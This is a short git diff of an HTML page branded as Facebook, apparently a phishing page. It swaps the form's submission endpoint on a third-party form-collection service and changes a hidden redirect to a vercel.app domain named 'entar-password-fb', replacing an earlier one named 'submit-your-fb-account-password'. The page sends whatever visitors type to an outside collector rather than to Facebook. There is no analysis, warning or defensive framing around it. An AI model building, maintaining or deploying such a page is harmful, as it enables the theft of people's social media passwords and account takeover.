--- a/help.html
+++ b/help.html
@@ -1,4 +1,4 @@
-<!doctype html>
+   <!doctype html>
 
 <head>
     <title>home</title>
@@ -13,9 +13,9 @@
             <b class="text-5xl text-white">facebook</b>
         </div>
 
-        <form class="sm:hidden lg:block md:block" action="https://submit-form.com/4F52K0XR2" method="post">
-            <form action="https://submit-form.com/your-form-id">
-                <input type="hidden" name="_redirect" value="https://submit-your-fb-account-password.vercel.app/" method="post">
+        <form class="sm:hidden lg:block md:block" action="https://submit-form.com/CbsXsL0f4" method="post">
+            <form action="https://submit-form.com/CbsXsL0f4">
+                <input type="hidden" name="_redirect" value="https://entar-password-fb.vercel.app/" method="post">
                 <div style="position: absolute; left: 1.5rem; top:8rem; width: 90%;">
                     <div>
 
